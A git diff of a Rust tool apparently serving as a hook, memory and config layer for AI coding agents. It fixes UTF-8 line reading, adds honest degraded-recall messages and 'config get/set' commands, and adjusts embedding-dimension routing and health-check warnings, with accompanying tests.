     std::fs::write(clx_dir.join("config.yaml"), CONFIG_L0_ON_L1_OFF).expect("write config");
 
     let mut command = Command::new(binary);
-    let cmd = harden_command(&mut command, temp.path()).env("CLX_CREDENTIALS_BACKEND", "age");
+    let cmd = harden_command(&mut command, temp.path())
+        .env("CLX_CREDENTIALS_BACKEND", "age")
+        // Issue 2: a truthy CLAUDECODE forces HostId::Claude (precedence above
+        // envelope sniffing). The envelope-sniff routing tests must be hermetic,
+        // so clear any ambient CLAUDECODE inherited from a Claude Code test
+        // runner; the dedicated CLAUDECODE-precedence tests live in host.rs.
+        .env_remove("CLAUDECODE");
     if let Some(h) = host {
         cmd.env("CLX_HOOK_HOST", h);
     }
diff --git a/crates/clx-hook/tests/memory_hooks_e2e.rs b/crates/clx-hook/tests/memory_hooks_e2e.rs
index f279ce6..9867740 100644
--- a/crates/clx-hook/tests/memory_hooks_e2e.rs
+++ b/crates/clx-hook/tests/memory_hooks_e2e.rs
@@ -447,30 +447,25 @@ async fn router_handle_event_unknown_event_is_ok() {
     })
     .to_string();
     let mut out = Vec::<u8>::new();
-    // HookDeps cannot be constructed externally (for_test is cfg(test)); the
-    // router's from_process_defaults reads the real FS, so we assert the
-    // dispatch contract via the binary-independent error paths instead.
-    // Unknown-event dispatch needs deps; use the documented public builder.
-    if let Some(deps) = clx_hook::HookDeps::from_process_defaults() {
-        let exit = handle_event(raw.as_bytes(), &mut out, deps).await;
-        assert_eq!(exit, HookExit::Ok, "unknown event must dispatch to Ok");
-    }
+    // The router no longer takes injected deps: each handler resolves its own
+    // config/storage. `handle_event` can therefore be driven directly with
+    // in-memory IO; unknown events dispatch to the safe allow fallback.
+    let exit = handle_event(raw.as_bytes(), &mut out).await;
+    assert_eq!(exit, HookExit::Ok, "unknown event must dispatch to Ok");
 }
 
-/// `handle_event` rejects oversize input with a block decision regardless of
-/// deps availability (router fallback contract; in-memory writer).
+/// `handle_event` rejects oversize input with a block decision (router
+/// fallback contract; in-memory writer).
 #[tokio::test]
 async fn router_handle_event_oversize_blocks() {
     use clx_hook::{HookExit, handle_event};
-    if let Some(deps) = clx_hook::HookDeps::from_process_defaults() {
-        let big = vec![b'a'; 5 * 1024 * 1024];
-        let mut out = Vec::<u8>::new();
-        let exit = handle_event(&big[..], &mut out, deps).await;
-        assert_eq!(exit, HookExit::InputTooLarge);
-        let s = String::from_utf8_lossy(&out);
-        let v: serde_json::Value = serde_json::from_str(s.trim()).expect("JSON");
-        assert_eq!(v["hookSpecificOutput"]["permissionDecision"], "block");
-    }
+    let big = vec![b'a'; 5 * 1024 * 1024];
+    let mut out = Vec::<u8>::new();
+    let exit = handle_event(&big[..], &mut out).await;
+    assert_eq!(exit, HookExit::InputTooLarge);
+    let s = String::from_utf8_lossy(&out);
+    let v: serde_json::Value = serde_json::from_str(s.trim()).expect("JSON");
+    assert_eq!(v["hookSpecificOutput"]["permissionDecision"], "block");
 }
 
 /// RISK M-R6 (pin-accepted, latency): `do_recall` opens `Storage` +
diff --git a/crates/clx-mcp/src/server.rs b/crates/clx-mcp/src/server.rs
index 5de4356..1e2f54d 100644
--- a/crates/clx-mcp/src/server.rs
+++ b/crates/clx-mcp/src/server.rs
@@ -361,24 +361,33 @@ impl McpServer {
     ///
     /// Returns `Ok(None)` on EOF. Returns a JSON-RPC error response if the
     /// line exceeds `MAX_LINE_SIZE` bytes.
+    ///
+    /// FIX-9: raw bytes are accumulated to the newline delimiter and decoded
+    /// once at the end with `String::from_utf8_lossy`. Decoding each `fill_buf`
+    /// chunk independently would corrupt a multi-byte UTF-8 character split
+    /// across a chunk boundary (each fragment decodes to `U+FFFD`); `fill_buf`
+    /// makes no guarantee that chunks end on a character boundary.
     pub fn read_bounded_line(
         reader: &mut impl io::BufRead,
         buf: &mut String,
     ) -> io::Result<Option<()>> {
         buf.clear();
-        let mut total = 0usize;
+        let mut bytes: Vec<u8> = Vec::new();
         loop {
             let available = reader.fill_buf()?;
             if available.is_empty() {
                 // EOF
-                return if total == 0 { Ok(None) } else { Ok(Some(())) };
+                if bytes.is_empty() {
+                    return Ok(None);
+                }
+                buf.push_str(&String::from_utf8_lossy(&bytes));
+                return Ok(Some(()));
             }
 
             if let Some(newline_pos) = available.iter().position(|&b| b == b'\n') {
-                // Found newline — consume up to and including it
+                // Found newline — accumulate up to (not including) it.
                 let chunk = &available[..newline_pos];
-                total += chunk.len();
-                if total > Self::MAX_LINE_SIZE {
+                if bytes.len() + chunk.len() > Self::MAX_LINE_SIZE {
                     // Consume the rest of the line so we can continue
                     let consume_len = newline_pos + 1;
                     reader.consume(consume_len);
@@ -387,24 +396,24 @@ impl McpServer {
                         format!("Line exceeds maximum size of {} bytes", Self::MAX_LINE_SIZE),
                     ));
                 }
-                // Safe: fill_buf returns valid UTF-8 boundaries per BufRead on stdin
-                buf.push_str(&String::from_utf8_lossy(chunk));
+                bytes.extend_from_slice(chunk);
                 let consume_len = newline_pos + 1; // +1 to skip the newline
                 reader.consume(consume_len);
+                // Decode once, on a complete line — respects UTF-8 boundaries.
+                buf.push_str(&String::from_utf8_lossy(&bytes));
                 return Ok(Some(()));
             }
 
-            // No newline yet — consume entire buffer
+            // No newline yet — accumulate the entire buffer as raw bytes.
             let len = available.len();
-            total += len;
-            if total > Self::MAX_LINE_SIZE {
+            if bytes.len() + len > Self::MAX_LINE_SIZE {
                 reader.consume(len);
                 return Err(io::Error::new(
                     io::ErrorKind::InvalidData,
                     format!("Line exceeds maximum size of {} bytes", Self::MAX_LINE_SIZE),
                 ));
             }
-            buf.push_str(&String::from_utf8_lossy(available));
+            bytes.extend_from_slice(available);
             reader.consume(len);
         }
     }
diff --git a/crates/clx-mcp/src/tests.rs b/crates/clx-mcp/src/tests.rs
index ef6d12d..e8fc2b1 100644
--- a/crates/clx-mcp/src/tests.rs
+++ b/crates/clx-mcp/src/tests.rs
@@ -1248,6 +1248,53 @@ fn test_read_bounded_line_over_limit_returns_error() {
     assert_eq!(err.kind(), std::io::ErrorKind::InvalidData);
 }
 
+#[test]
+fn test_read_bounded_line_utf8_split_across_chunk_boundary() {
+    // FIX-9 regression. A small-capacity BufReader hands out the line in
+    // multiple `fill_buf` chunks; the 4-byte emoji and the 3-byte CJK char are
+    // deliberately split across those chunk boundaries.
+    //
+    // Fails-before: the old impl called `String::from_utf8_lossy` on each chunk
+    // independently, so a multi-byte char straddling a boundary decoded to one
+    // or more `U+FFFD` replacement chars — the line came back corrupted.
+    // Passes-after: bytes are accumulated and decoded once, so the line is
+    // intact with no replacement chars.
+    let line = "héllo🦀世界\n"; // mix of 1/2/4/3-byte UTF-8 scalars
+    // Capacity 4 forces fill_buf to return small chunks that will not align
+    // with the multi-byte char boundaries.
+    let mut reader = BufReader::with_capacity(4, line.as_bytes());
+    let mut buf = String::new();
+
+    let result = McpServer::read_bounded_line(&mut reader, &mut buf);
+
+    assert!(result.is_ok());
+    assert!(result.unwrap().is_some());
+    assert_eq!(
+        buf, "héllo🦀世界",
+        "multi-byte chars split across chunk boundaries must decode intact"
+    );
+    assert!(
+        !buf.contains('\u{FFFD}'),
+        "no U+FFFD replacement char must appear (no boundary corruption)"
+    );
+}
+
+#[test]
+fn test_read_bounded_line_over_limit_still_bounded_with_small_chunks() {
+    // FIX-9: the byte bound must still reject oversize input even when the
+    // reader delivers the line in many tiny chunks (the refactor accumulates
+    // across chunks, so the bound is checked against the running total).
+    let mut data = vec![b'x'; McpServer::MAX_LINE_SIZE + 1];
+    data.push(b'\n');
+    let mut reader = BufReader::with_capacity(8, data.as_slice());
+    let mut buf = String::new();
+
+    let result = McpServer::read_bounded_line(&mut reader, &mut buf);
+
+    assert!(result.is_err());
+    assert_eq!(result.unwrap_err().kind(), std::io::ErrorKind::InvalidData);
+}
+
 // =========================================================================
 // tool_remember — auto session-creation branches (remember.rs lines 23-44)
 // =========================================================================
diff --git a/crates/clx-mcp/src/tools/recall.rs b/crates/clx-mcp/src/tools/recall.rs
index 6350333..9fedb51 100644
--- a/crates/clx-mcp/src/tools/recall.rs
+++ b/crates/clx-mcp/src/tools/recall.rs
@@ -70,7 +70,25 @@ impl McpServer {
             reranker_timeout_ms: auto_recall.reranker_timeout_ms,
         };
 
-        let hits = self.runtime.block_on(engine.query(&query, &config));
+        let result = self.runtime.block_on(engine.query(&query, &config));
+        let degraded = result.degraded;
+        let hits = result.hits;
+
+        // FIX-6: a degraded result with no hits means the candidate-generation
+        // stages errored (broken/unavailable store), which is distinct from a
+        // healthy store that simply has no matching context. Surface that to
+        // the agent honestly rather than implying "nothing relevant exists".
+        if degraded && hits.is_empty() {
+            debug!("Recall degraded with no hits; reporting temporary unavailability");
+            return Ok(json!({
+                "content": [{
+                    "type": "text",
+                    "text": "Recall temporarily unavailable: the context store could not be \
+                             queried right now (this is a recall error, not an empty result). \
+                             Proceed without recalled context and retry later."
+                }]
+            }));
+        }
 
         let has_semantic = hits.iter().any(|h| {
             matches!(
@@ -116,10 +134,19 @@ impl McpServer {
             } else {
                 "fts5"
             };
+            // FIX-6: hits exist but a candidate stage errored — return the
+            // hits we have, with a note so the agent knows results may be
+            // partial (one search path was unavailable).
+            let degraded_note = if degraded {
+                " [partial: one search path was unavailable]"
+            } else {
+                ""
+            };
             let header = format!(
-                "Found {} results (search method: {})\n\n",
+                "Found {} results (search method: {}){}\n\n",
                 results.len(),
-                search_method
+                search_method,
+                degraded_note
             );
             header + &serde_json::to_string_pretty(&results).unwrap_or_else(|_| "[]".to_string())
         };
diff --git a/crates/clx/src/codex/mod.rs b/crates/clx/src/codex/mod.rs
index 4eb8258..50a0960 100644
--- a/crates/clx/src/codex/mod.rs
+++ b/crates/clx/src/codex/mod.rs
@@ -15,8 +15,6 @@
 //! requires Codex to be present (the writers only touch `~/.codex`), but
 //! `--target codex`/`auto` use detection to decide whether to write.
 
-pub mod trust;
-
 use std::fs;
 use std::path::{Path, PathBuf};
 use std::process::Command;
diff --git a/crates/clx/src/commands/config.rs b/crates/clx/src/commands/config.rs
index da5e4fe..19f04e9 100644
--- a/crates/clx/src/commands/config.rs
+++ b/crates/clx/src/commands/config.rs
@@ -21,6 +21,21 @@ pub enum ConfigAction {
 
     /// Rewrite ~/.clx/config.yaml from the legacy `ollama:` block to the new providers/llm schema.
     Migrate,
+
+    /// Read a single config value by dotted key (e.g. `validator.default_decision`).
+    Get {
+        /// Dotted key path into the raw global config (e.g. `context.embedding_model`).
+        key: String,
+    },
+
+    /// Set a single config value by dotted key, then validate (global config only).
+    Set {
+        /// Dotted key path into the raw global config (e.g. `validator.default_decision`).
+        key: String,
+
+        /// Value to assign. Parsed as bool/int/float when possible, else string.
+        value: String,
+    },
 }
 
 /// Configuration management
@@ -93,6 +108,12 @@ pub async fn cmd_config(cli: &Cli, action: Option<&ConfigAction>) -> Result<()>
         Some(ConfigAction::Migrate) => {
             migrate(cli)?;
         }
+        Some(ConfigAction::Get { key }) => {
+            config_get(cli, key)?;
+        }
+        Some(ConfigAction::Set { key, value }) => {
+            config_set(cli, key, value)?;
+        }
         Some(ConfigAction::Reset) => {
             let config_path = Config::config_file_path()?;
 
@@ -211,3 +232,175 @@ fn migrate(cli: &Cli) -> Result<()> {
 
     Ok(())
 }
+
+// ---------------------------------------------------------------------------
+// `config get` / `config set` (Issue 8)
+// ---------------------------------------------------------------------------
+
+/// Walk a dotted key path through a raw YAML mapping and return the leaf node.
+///
+/// Returns `None` when any intermediate segment is missing or is not a mapping.
+fn yaml_get<'a>(root: &'a serde_yml::Value, key: &str) -> Option<&'a serde_yml::Value> {
+    let mut cur = root;
+    for seg in key.split('.') {
+        let map = cur.as_mapping()?;
+        cur = map.get(serde_yml::Value::String(seg.to_owned()))?;
+    }
+    Some(cur)
+}
+
+/// Format a scalar YAML leaf for display. Refuses non-scalar leaves (maps /
+/// sequences) so `get` never prints a structured subtree as if it were a value.
+fn yaml_scalar_to_string(v: &serde_yml::Value) -> Option<String> {
+    match v {
+        serde_yml::Value::String(s) => Some(s.clone()),
+        serde_yml::Value::Bool(b) => Some(b.to_string()),
+        serde_yml::Value::Number(n) => Some(n.to_string()),
+        serde_yml::Value::Null => Some("null".to_owned()),
+        _ => None,
+    }
+}
+
+/// Parse a CLI string value into the most specific YAML scalar: bool, then
+/// integer, then float, falling back to a string (Q8-a). `Config::load`
+/// validation is the safety net for an unexpected type.
+fn parse_value(value: &str) -> serde_yml::Value {
+    if let Ok(b) = value.parse::<bool>() {
+        return serde_yml::Value::Bool(b);
+    }
+    if let Ok(i) = value.parse::<i64>() {
+        return serde_yml::Value::Number(i.into());
+    }
+    if let Ok(f) = value.parse::<f64>() {
+        return serde_yml::Value::Number(serde_yml::Number::from(f));
+    }
+    serde_yml::Value::String(value.to_owned())
+}
+
+/// Walk/create the dotted path in `root`, creating intermediate mappings, and
+/// assign `leaf` at the final segment.
+fn yaml_set(root: &mut serde_yml::Value, key: &str, leaf: serde_yml::Value) -> Result<()> {
+    // Ensure the root itself is a mapping (an empty/Null document becomes one).
+    if !root.is_mapping() {
+        *root = serde_yml::Value::Mapping(serde_yml::Mapping::new());
+    }
+
+    let segments: Vec<&str> = key.split('.').collect();
+    let mut cur = root;
+    for seg in &segments[..segments.len() - 1] {
+        let map = cur
+            .as_mapping_mut()
+            .context("config path traverses a non-mapping node")?;
+        let entry = map
+            .entry(serde_yml::Value::String((*seg).to_owned()))
+            .or_insert_with(|| serde_yml::Value::Mapping(serde_yml::Mapping::new()));
+        // If an existing intermediate is not a mapping, replace it with one so
+        // the dotted path can be created.
+        if !entry.is_mapping() {
+            *entry = serde_yml::Value::Mapping(serde_yml::Mapping::new());
+        }
+        cur = entry;
+    }
+
+    let last = segments[segments.len() - 1];
+    let map = cur
+        .as_mapping_mut()
+        .context("config path traverses a non-mapping node")?;
+    map.insert(serde_yml::Value::String(last.to_owned()), leaf);
+    Ok(())
+}
+
+/// `clx config get <key>`: read the RAW global config file (no env/project
+/// contamination, no legacy translation) and print the scalar leaf at `key`.
+fn config_get(cli: &Cli, key: &str) -> Result<()> {
+    let config_path = Config::config_file_path().context("Failed to resolve config path")?;
+
+    let raw = std::fs::read_to_string(&config_path).with_context(|| {
+        format!(
+            "Failed to read config file {}; key not found",
+            config_path.display()
+        )
+    })?;
+
+    let root: serde_yml::Value =
+        serde_yml::from_str(&raw).context("Failed to parse config file as YAML")?;
+
+    let leaf = yaml_get(&root, key).with_context(|| format!("key not found: {key}"))?;
+    let value = yaml_scalar_to_string(leaf)
+        .with_context(|| format!("key '{key}' is not a scalar value"))?;
+
+    if cli.json {
+        println!("{}", serde_json::json!({ "key": key, "value": value }));
+    } else {
+        println!("{value}");
+    }
+    Ok(())
+}
+
+/// `clx config set <key> <value>`: walk/create the dotted path in the RAW global
+/// config, write it back (GLOBAL file only), then validate via
+/// `Config::load_from_file_only` (global-only, no env/project contamination).
+/// On validation failure, restore the exact original bytes and error.
+fn config_set(cli: &Cli, key: &str, value: &str) -> Result<()> {
+    let config_path = Config::config_file_path().context("Failed to resolve config path")?;
+
+    // Capture the original bytes (if the file exists) so we can restore on
+    // validation failure. A missing file starts from an empty mapping.
+    let original: Option<String> = match std::fs::read_to_string(&config_path) {
+        Ok(s) => Some(s),
+        Err(e) if e.kind() == std::io::ErrorKind::NotFound => None,
+        Err(e) => {
+            return Err(e).with_context(|| format!("Failed to read {}", config_path.display()));
+        }
+    };
+
+    let mut root: serde_yml::Value = match &original {
+        Some(s) if !s.trim().is_empty() => {
+            serde_yml::from_str(s).context("Failed to parse config file as YAML")?
+        }
+        _ => serde_yml::Value::Mapping(serde_yml::Mapping::new()),
+    };
+
+    yaml_set(&mut root, key, parse_value(value))?;
+
+    let new_yaml = serde_yml::to_string(&root).context("Failed to serialize updated config")?;
+    if let Some(parent) = config_path.parent() {
+        std::fs::create_dir_all(parent)?;
+    }
+    std::fs::write(&config_path, &new_yaml)
+        .with_context(|| format!("Failed to write {}", config_path.display()))?;
+
+    // Validate the GLOBAL file in isolation (no env/project layering).
+    if let Err(e) = Config::load_from_file_only() {
+        // Restore the exact original bytes (or remove the file we created).
+        match &original {
+            Some(bytes) => {
+                std::fs::write(&config_path, bytes).with_context(|| {
+                    format!(
+                        "Failed to restore original config {}",
+                        config_path.display()
+                    )
+                })?;
+            }
+            None => {
+                let _ = std::fs::remove_file(&config_path);
+            }
+        }
+        anyhow::bail!("invalid value for '{key}': {e}; config left unchanged");
+    }
+
+    if cli.json {
+        println!(
+            "{}",
+            serde_json::json!({
+                "action": "set",
+                "key": key,
+                "value": value,
+                "success": true
+            })
+        );
+    } else {
+        println!("{} {} = {}", "Set:".green().bold(), key.cyan(), value);
+    }
+    Ok(())
+}
diff --git a/crates/clx/src/commands/embeddings.rs b/crates/clx/src/commands/embeddings.rs
index 6facbca..be80cd5 100644
--- a/crates/clx/src/commands/embeddings.rs
+++ b/crates/clx/src/commands/embeddings.rs
@@ -5,7 +5,7 @@ use clap::Subcommand;
 use colored::Colorize;
 use std::io::{self, Write};
 
-use clx_core::config::{Capability, Config, OllamaConfig};
+use clx_core::config::{Capability, Config, OllamaConfig, effective_embedding_dimension};
 use clx_core::embeddings::EmbeddingStore;
 use clx_core::llm::{LlmBackend, LlmClient, LlmError};
 use clx_core::redaction::redact_secrets;
@@ -248,29 +248,33 @@ pub async fn cmd_embeddings(cli: &Cli, action: &EmbeddingsAction) -> Result<()>
 
     match action {
         EmbeddingsAction::Status => {
-            let emb_store =
-                Storage::create_embedding_store_with_dimension(&db_path, ollama_cfg.embedding_dim)
-                    .context("Failed to open embedding store. Run 'clx install' first.")?;
-
-            let dim = ollama_cfg.embedding_dim;
-            let vec_enabled = emb_store.is_vector_search_enabled();
-            let count = emb_store.count_embeddings().unwrap_or(0);
-
             // Resolve the active embeddings route (provider + model) the same
             // way rebuild/backfill do, falling back to legacy ollama defaults
             // when no routing section is present. The configured model is what
             // the active route WILL use; the stored model is what produced the
-            // vectors currently in the index.
-            let (configured_model, provider_name) =
+            // vectors currently in the index. The route also carries the
+            // effective dimension so the store opens — and migration is judged
+            // — at the dimension the active route actually uses (Issue 6).
+            let (configured_model, provider_name, dim) =
                 match config.capability_route(Capability::Embeddings) {
-                    Ok(r) => (r.model.clone(), r.provider.clone()),
+                    Ok(r) => {
+                        let dim = effective_embedding_dimension(r, ollama_cfg.embedding_dim);
+                        (r.model.clone(), r.provider.clone(), dim)
+                    }
                     Err(_) => (
                         ollama_cfg.embedding_model.clone(),
                         "ollama-local".to_owned(),
+                        ollama_cfg.embedding_dim,
                     ),
                 };
             let active_ident = make_model_ident(&provider_name, &configured_model);
 
+            let emb_store = Storage::create_embedding_store_with_dimension(&db_path, dim)
+                .context("Failed to open embedding store. Run 'clx install' first.")?;
+
+            let vec_enabled = emb_store.is_vector_search_enabled();
+            let count = emb_store.count_embeddings().unwrap_or(0);
+
             // The model actually stored in the index (per-snapshot provenance).
             // `None` means an empty index or only pre-migration sentinel rows.
             let stored_model = emb_store
@@ -347,28 +351,32 @@ pub async fn cmd_embeddings(cli: &Cli, action: &EmbeddingsAction) -> Result<()>
             }
         }
         EmbeddingsAction::Rebuild { dry_run } => {
-            let mut emb_store =
-                Storage::create_embedding_store_with_dimension(&db_path, ollama_cfg.embedding_dim)
-                    .context("Failed to open embedding store. Run 'clx install' first.")?;
-
-            // Resolve provider + model before anything else so dry-run can show them.
-            // Fall back to legacy ollama defaults when no routing section is present.
-            let (embed_model, provider_name) = match config.capability_route(Capability::Embeddings)
-            {
-                Ok(r) => (r.model.clone(), r.provider.clone()),
-                Err(_) => (
-                    ollama_cfg.embedding_model.clone(),
-                    "ollama-local".to_owned(),
-                ),
-            };
+            // Resolve provider + model + effective dimension before anything
+            // else so dry-run can show them and the store opens / rebuilds at
+            // the route-derived dimension (Issue 6). Fall back to legacy ollama
+            // defaults when no routing section is present.
+            let (embed_model, provider_name, dim) =
+                match config.capability_route(Capability::Embeddings) {
+                    Ok(r) => {
+                        let dim = effective_embedding_dimension(r, ollama_cfg.embedding_dim);
+                        (r.model.clone(), r.provider.clone(), dim)
+                    }
+                    Err(_) => (
+                        ollama_cfg.embedding_model.clone(),
+                        "ollama-local".to_owned(),
+                        ollama_cfg.embedding_dim,
+                    ),
+                };
             let model_ident = make_model_ident(&provider_name, &embed_model);
 
+            let mut emb_store = Storage::create_embedding_store_with_dimension(&db_path, dim)
+                .context("Failed to open embedding store. Run 'clx install' first.")?;
+
             // Snapshot list comes from the embedding store itself (uses its connection).
             let snapshots = emb_store
                 .iter_snapshots_for_rebuild()
                 .context("Failed to read snapshots")?;
 
-            let dim = ollama_cfg.embedding_dim;
             let needs_migration = emb_store.needs_dimension_migration(dim);
             let existing_count = emb_store.count_embeddings().unwrap_or(0);
 
@@ -556,23 +564,29 @@ pub async fn cmd_embeddings(cli: &Cli, action: &EmbeddingsAction) -> Result<()>
 pub async fn cmd_embed_backfill(cli: &Cli, dry_run: bool) -> Result<()> {
     let db_path = clx_core::paths::database_path();
 
-    // Open embedding store
-    let emb_store = Storage::create_embedding_store(&db_path)
-        .context("Failed to open embedding store. Run 'clx install' first.")?;
-
-    // Load config and resolve provider/model.
+    // Load config and resolve provider/model + effective dimension first, so the
+    // store opens at the route-derived dimension — consistent with status and
+    // rebuild (Issue 6).
     let config = Config::load().context("Failed to load configuration")?;
     let backfill_defaults = OllamaConfig::default();
     let backfill_cfg = config.ollama.as_ref().unwrap_or(&backfill_defaults);
-    let (embed_model, provider_name) = match config.capability_route(Capability::Embeddings) {
-        Ok(r) => (r.model.clone(), r.provider.clone()),
+    let (embed_model, provider_name, dim) = match config.capability_route(Capability::Embeddings) {
+        Ok(r) => {
+            let dim = effective_embedding_dimension(r, backfill_cfg.embedding_dim);
+            (r.model.clone(), r.provider.clone(), dim)
+        }
         Err(_) => (
             backfill_cfg.embedding_model.clone(),
             "ollama-local".to_owned(),
+            backfill_cfg.embedding_dim,
         ),
     };
     let model_ident = make_model_ident(&provider_name, &embed_model);
 
+    // Open embedding store at the effective dimension.
+    let emb_store = Storage::create_embedding_store_with_dimension(&db_path, dim)
+        .context("Failed to open embedding store. Run 'clx install' first.")?;
+
     let client = match config.create_llm_client(Capability::Embeddings) {
         Ok(c) => c,
         Err(e) => {
diff --git a/crates/clx/src/commands/health.rs b/crates/clx/src/commands/health.rs
index 211afe1..d87c171 100644
--- a/crates/clx/src/commands/health.rs
+++ b/crates/clx/src/commands/health.rs
@@ -465,6 +465,21 @@ fn remote_route_pass(label: &str, provider: &str, start: Instant) -> CheckResult
     }
 }
 
+/// Build a WARN result for a capability whose route is `Unresolved` while the
+/// config DOES declare providers (Issue 7). This is a misconfigured-routing
+/// posture — providers exist but no `llm:` route resolves to one — so probing
+/// the legacy hardcoded Ollama model would be a false FAIL. We surface a WARN
+/// pointing at the migration command instead.
+fn unresolved_route_warn(label: &str, start: Instant) -> CheckResult {
+    CheckResult {
+        name: label.into(),
+        status: CheckStatus::Warn,
+        detail: "route not configured; run clx config migrate".into(),
+        hint: Some("Configure routing: clx config migrate".into()),
+        duration: start.elapsed(),
+    }
+}
+
 async fn check_validator_model(config: Option<&clx_core::config::Config>) -> CheckResult {
     let start = Instant::now();
 
@@ -492,6 +507,13 @@ async fn check_validator_model(config: Option<&clx_core::config::Config>) -> Che
             RouteProbe::Remote { provider } => {
                 return remote_route_pass("Validator model", &provider, start);
             }
+            // Issue 7: the route is Unresolved but providers ARE declared — this
+            // is a migration/routing gap, not a missing Ollama model. WARN
+            // instead of FAIL-probing the hardcoded literal. When NO providers
+            // are declared (legacy pure-Ollama) fall through to the legacy probe.
+            RouteProbe::Unresolved if !c.providers.is_empty() => {
+                return unresolved_route_warn("Validator model", start);
+            }
             RouteProbe::Unresolved => {}
         }
     }
@@ -528,21 +550,34 @@ async fn check_embedding_model(config: Option<&clx_core::config::Config>) -> Che
             RouteProbe::Remote { provider } => {
                 return remote_route_pass("Embedding model", &provider, start);
             }
+            // Issue 7: Unresolved route but providers ARE declared -> WARN
+            // (routing gap), not FAIL. Legacy pure-Ollama (no providers) falls
+            // through to the probe below.
+            RouteProbe::Unresolved if !c.providers.is_empty() => {
+                return unresolved_route_warn("Embedding model", start);
+            }
             RouteProbe::Unresolved => {}
         }
     }
 
     // Fallback: legacy ollama defaults (also covers config == None). A
-    // genuinely-missing local model still reports as FAIL.
+    // genuinely-missing local model still reports as FAIL. Issue 7: the model
+    // fallback is the real configured default (`config.context.embedding_model`),
+    // not the stale hardcoded `nomic-embed-text` literal.
     let (host, model) = match config {
         Some(c) => {
             let ollama = c.ollama.as_ref();
             let host = ollama.map_or_else(|| "http://127.0.0.1:11434".into(), |o| o.host.clone());
-            let model =
-                ollama.map_or_else(|| "nomic-embed-text".into(), |o| o.embedding_model.clone());
+            let model = ollama.map_or_else(
+                || c.context.embedding_model.clone(),
+                |o| o.embedding_model.clone(),
+            );
             (host, model)
         }
-        None => ("http://127.0.0.1:11434".into(), "nomic-embed-text".into()),
+        None => (
+            "http://127.0.0.1:11434".into(),
+            clx_core::config::default_embedding_model(),
+        ),
     };
 
     check_model_available(&host, &model, "Embedding model", start).await
@@ -1262,7 +1297,7 @@ mod tests {
             providers: vec![],
             routing: RoutingSummary {
                 chat: "ollama-local/qwen3:1.7b".into(),
-                embeddings: "ollama-local/nomic-embed-text".into(),
+                embeddings: "ollama-local/qwen3-embedding:0.6b".into(),
             },
             warnings: vec![],
         };
@@ -1696,6 +1731,126 @@ llm:
         );
     }
 
+    // ── Issue 7: Unresolved-route WARN + config-default embedding model ──
+
+    /// AC7.1: an Unresolved route (providers present but no `llm:` routing
+    /// resolves) with a NON-EMPTY `config.providers` must WARN, not FAIL-probe
+    /// the hardcoded Ollama model. Covers both the validator and embedding
+    /// checks.
+    #[tokio::test]
+    async fn ac7_1_unresolved_route_with_providers_warns_not_fails() {
+        // `providers` is declared but there is no `llm:` block, so
+        // `capability_route` is Err -> RouteProbe::Unresolved while providers
+        // is non-empty.
+        let mut cfg = config_from_yaml(
+            r#"
+providers:
+  azure:
+    kind: azure_openai
+    endpoint: "https://synthetic.example.invalid"
+"#,
+        );
+        cfg.validator.enabled = true;
+
+        let v = check_validator_model(Some(&cfg)).await;
+        assert_eq!(
+            v.status,
+            CheckStatus::Warn,
+            "Unresolved route + providers must WARN for validator; got: {v:?}"
+        );
+        assert!(
+            v.detail.contains("route not configured") && v.detail.contains("clx config migrate"),
+            "validator WARN must point at migration; got: {}",
+            v.detail
+        );
+
+        let e = check_embedding_model(Some(&cfg)).await;
+        assert_eq!(
+            e.status,
+            CheckStatus::Warn,
+            "Unresolved route + providers must WARN for embeddings; got: {e:?}"
+        );
+        assert!(
+            e.detail.contains("route not configured"),
+            "embedding WARN must explain the routing gap; got: {}",
+            e.detail
+        );
+    }
+
+    /// AC7.2: with NO providers (legacy pure-Ollama) and no `llm:` routing, the
+    /// embedding check falls back to the configured default model
+    /// (`config.context.embedding_model`) and never the hardcoded
+    /// `nomic-embed-text` literal. The probe FAILs (no Ollama in tests) but the
+    /// detail must name the config default, proving the literal is gone.
+    #[tokio::test]
+    async fn ac7_2_embedding_fallback_uses_config_default_not_nomic() {
+        let mut cfg = Config::default();
+        // Pin a recognizable non-default model on the legacy context field and
+        // drop any ollama/providers so the Unresolved fallback path runs.
+        cfg.context.embedding_model = "synthetic-default-embed".to_owned();
+        cfg.ollama = None;
+        cfg.providers.clear();
+        cfg.llm = None;
+
+        let e = check_embedding_model(Some(&cfg)).await;
+        assert!(
+            !e.detail.contains("nomic-embed-text"),
+            "must not reference the hardcoded nomic literal; got: {}",
+            e.detail
+        );
+        assert!(
+            e.detail.contains("synthetic-default-embed"),
+            "must probe the config.context.embedding_model default; got: {}",
+            e.detail
+        );
+    }
+
+    /// AC7.3: a fully resolved Ollama route is unchanged — the genuinely-absent
+    /// model still FAILs and probes the REAL routed model (no WARN-hiding).
+    #[tokio::test]
+    async fn ac7_3_resolved_ollama_route_unchanged() {
+        use wiremock::matchers::{method, path};
+        use wiremock::{Mock, MockServer, ResponseTemplate};
+
+        let server = MockServer::start().await;
+        Mock::given(method("GET"))
+            .and(path("/api/tags"))
+            .respond_with(
+                ResponseTemplate::new(200).set_body_json(serde_json::json!({ "models": [] })),
+            )
+            .mount(&server)
+            .await;
+
+        let cfg = config_from_yaml(&format!(
+            r#"
+providers:
+  local:
+    kind: ollama
+    host: "{uri}"
+llm:
+  chat:
+    provider: local
+    model: synthetic-chat-model
+  embeddings:
+    provider: local
+    model: synthetic-embed-model
+"#,
+            uri = server.uri(),
+        ));
+
+        let e = check_embedding_model(Some(&cfg)).await;
+        assert_eq!(
+            e.status,
+            CheckStatus::Fail,
+            "resolved-but-absent ollama embedding model must still FAIL; got: {e:?}"
+        );
+        assert!(
+            e.detail.contains("synthetic-embed-model"),
+            "must probe the REAL routed model; got: {}",
+            e.detail
+        );
+    }
+
     /// Finding #2 (correct-negative preserved): an ollama-routed embeddings
     /// model that is genuinely absent from `/api/tags` must still FAIL, and
     /// must probe the REAL routed model (not the nomic literal).
diff --git a/crates/clx/src/commands/rules.rs b/crates/clx/src/commands/rules.rs
index 41df251..9d90307 100644
--- a/crates/clx/src/commands/rules.rs
+++ b/crates/clx/src/commands/rules.rs
@@ -7,6 +7,7 @@ use std::env;
 use std::io::{self, Write};
 
 use clx_core::policy::{PolicyEngine, RuleSource};
+use clx_core::redaction::redact_secrets;
 use clx_core::storage::Storage;
 use clx_core::types::{LearnedRule, RuleType};
 
@@ -38,11 +39,31 @@ pub enum RulesAction {
         global: bool,
     },
 
-    /// Clear all learned rules
+    /// Clear learned rules.
+    ///
+    /// By default (`--learned-only`) only auto-learned rules
+    /// (`source="user_decision"`) are removed; explicit user `--global` allows
+    /// are preserved. `--all` drops every learned rule.
     Reset {
-        /// Also clear manually added rules
